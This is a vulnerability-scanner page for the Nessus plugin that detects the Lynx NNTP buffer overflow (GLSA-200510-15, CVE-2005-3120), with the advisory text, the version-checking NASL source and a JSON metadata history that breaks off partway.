GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing
2005-10-19T00:00:00
ID GENTOO_GLSA-200510-15.NASL Type nessus Reporter This script is Copyright (C) 2005-2019 Tenable Network Security, Inc. Modified 2019-12-02T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200510-15
(Lynx: Buffer overflow in NNTP processing)
When accessing an NNTP URL, Lynx connects to an NNTP server and
retrieves information about the available articles in the target
newsgroup. Ulf Harnhammar discovered a buffer overflow in a function
that handles the escaping of special characters.
Impact :
An attacker could set up a malicious NNTP server and entice a user
to access it using Lynx (either by creating NNTP links on a web page or
by forcing a redirect for Lynx users). The data returned by the NNTP
server would trigger the buffer overflow, allowing execution of arbitrary
code with the rights of the user running Lynx.
Workaround :
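There is no known workaround at this time. The remediation given in the plugin's solution text is to upgrade to www-client/lynx 2.8.5-r1 or later.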
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200510-15.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include("compat.inc");
# Registration phase: when `description` is set, the plugin only declares its
# metadata and then exits (see exit(0) at the end of this block); none of the
# host checks below this block run in this mode.
if (description)
{
# Plugin identity and revision as recorded in this copy of the script.
script_id(20035);
script_version("1.16");
script_cvs_date("Date: 2019/08/02 13:32:42");
# Cross-references: the CVE and the Gentoo advisory this check is derived from.
script_cve_id("CVE-2005-3120");
script_xref(name:"GLSA", value:"200510-15");
script_name(english:"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing");
# The summary states the detection method: package records are inspected.
# The visible script body only reads KB items and calls the qpkg_* helpers;
# it does not exercise the NNTP code path itself.
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
# Advisory text (copied from GLSA 200510-15 per the file header). The line
# breaks inside the literal are part of the string and are reported as-is.
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200510-15
(Lynx: Buffer overflow in NNTP processing)
When accessing a NNTP URL, Lynx connects to a NNTP server and
retrieves information about the available articles in the target
newsgroup. Ulf Harnhammar discovered a buffer overflow in a function
that handles the escaping of special characters.
Impact :
An attacker could setup a malicious NNTP server and entice a user
to access it using Lynx (either by creating NNTP links on a web page or
by forcing a redirect for Lynx users). The data returned by the NNTP
server would trigger the buffer overflow and execute arbitrary code
with the rights of the user running Lynx.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200510-15"
);
# Remediation text: upgrade to www-client/lynx 2.8.5-r1 or later. This is the
# same version boundary that the qpkg_check() call in the check logic uses.
# The lines starting with '#' below are shell prompts inside the string
# literal, not NASL comments.
script_set_attribute(
attribute:"solution",
value:
"All Lynx users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'"
);
# CVSSv2 base vector: network vector, low complexity, no authentication,
# partial impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
# Declared as a "local" plugin: the result depends on data collected from the
# host (see script_require_keys below), so a scan without that data cannot
# report on this issue.
script_set_attribute(attribute:"plugin_type", value:"local");
# CPE identifiers for the affected package and the platform.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:lynx");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
# Timeline attributes: patch, plugin and vulnerability publication dates.
script_set_attribute(attribute:"patch_publication_date", value:"2005/10/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/19");
script_set_attribute(attribute:"vuln_publication_date", value:"2005/08/20");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
# Declares ssh_get_info.nasl as a prerequisite; presumably that plugin fills
# the Host/* KB entries required below -- confirm against that plugin.
script_dependencies("ssh_get_info.nasl");
# KB entries the plugin requires. The same three keys are checked again with
# get_kb_item() after the includes, each with its own audit message.
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
# End of registration: leave before any check logic runs.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
# Preconditions. Each guard reads one KB entry and hands off to audit() with a
# specific reason when it is absent, so a missing precondition is reported as
# "could not check" rather than as "not vulnerable".
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}
if (!get_kb_item("Host/Gentoo/release"))
{
  audit(AUDIT_OS_NOT, "Gentoo");
}
if (!get_kb_item("Host/Gentoo/qpkg-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Version comparison for www-client/lynx: "lt 2.8.5-r1" is listed as
# vulnerable, "ge 2.8.5-r1" as unaffected. qpkg_check() comes from qpkg.inc
# (not shown here); presumably it evaluates these ranges against the package
# list gathered from the host -- confirm in qpkg.inc.
# NOTE(review): this is a package-version comparison only; a result here says
# nothing about whether the NNTP code path is reachable on the host.
flag = 0;
if (qpkg_check(
      package:"www-client/lynx",
      unaffected:make_list("ge 2.8.5-r1"),
      vulnerable:make_list("lt 2.8.5-r1")))
{
  flag++;
}

if (!flag)
{
  # Nothing flagged: report either "not affected" with the list of tested
  # packages, or "not installed" when no test was recorded.
  tested = qpkg_tests_get();
  if (!tested)
  {
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "Lynx");
  }
  else
  {
    audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  }
}
else
{
  # Flagged: raise the finding on port 0, attaching the qpkg report text only
  # when report verbosity is above zero.
  if (report_verbosity <= 0)
  {
    security_hole(0);
  }
  else
  {
    security_hole(port:0, extra:qpkg_report_get());
  }
  exit(0);
}
{"id": "GENTOO_GLSA-200510-15.NASL", "bulletinFamily": "scanner", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2005-10-19T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20035", "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200510-15"], "cvelist": ["CVE-2005-3120"], "type": "nessus", "lastseen": "2019-12-13T07:33:17", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. 
Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 1, "enchantments": {}, "hash": "23657a581fe81c33ff322bf7c357a2a0316c156c4772a0f6c26d884a46440046", "hashmap": [{"hash": "cc89a7b7faee73f5e1d4fdab043ad839", "key": "sourceData"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2016-09-26T17:24:59", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.2", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": 
"Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:49:33 $\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_osvdb_id(18914, 20019);\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:59"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). 
The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6b00044d514d9820bc0df87ffb443f5ad0411b9f5c5c1735cbc4d4de41bd0641", "hashmap": [{"hash": "668299569e0b62d5e14770fe8999084b", "key": "sourceData"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2018-09-01T23:50:52", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo 
Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:50:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:23:50", "references": [{"idList": ["SECURITYVULNS:DOC:9961"], "type": "securityvulns"}, {"idList": ["GLSA-200510-15"], "type": "gentoo"}, {"idList": ["DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E", "DEBIAN:DSA-876-1:39741"], "type": "debian"}, {"idList": ["CESA-2005:803", "CESA-2005:803-01"], "type": "centos"}, {"idList": ["OSVDB:20019"], "type": "osvdb"}, {"idList": ["USN-206-1"], "type": "ubuntu"}, {"idList": ["RHSA-2005:803"], "type": "redhat"}, {"idList": ["CVE-2005-3120"], "type": "cve"}, {"idList": ["EDB-ID:1256"], "type": "exploitdb"}, {"idList": ["SSA-2005-310-03"], "type": "slackware"}, {"idList": ["FEDORA_2005-994.NASL", "MANDRAKE_MDKSA-2005-186.NASL", "REDHAT-RHSA-2005-803.NASL", "UBUNTU_USN-206-1.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "DEBIAN_DSA-876.NASL", "CENTOS_RHSA-2005-803.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-874.NASL", "SLACKWARE_SSA_2005-310-03.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:55752", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:56855", "OPENVAS:136141256231055806", "OPENVAS:55658", "OPENVAS:55750"], "type": "openvas"}, {"idList": ["C01170BF-4990-11DA-A1B8-000854D03344"], "type": "freebsd"}]}, "score": {"modified": "2019-10-28T20:23:50", "value": 7.0, "vector": "NONE"}}, "hash": "d9e354cc9d2038bebaa2476908469051449f4f9482678ca44cbb819286c5e561", "hashmap": [{"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "8e15c6b081241240f6a69d63bdc75473", "key": "description"}, {"hash": 
"2ec58e3149bbfdca87c6474a76a01482", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "f5bbe8a2cc6600991512b750e4790ba4", "key": "sourceData"}, {"hash": "507c1dcbb71af7a074b2f9898d9bcebb", "key": "reporter"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2019-10-28T20:23:50", "modified": "2019-10-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:23:50"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). 
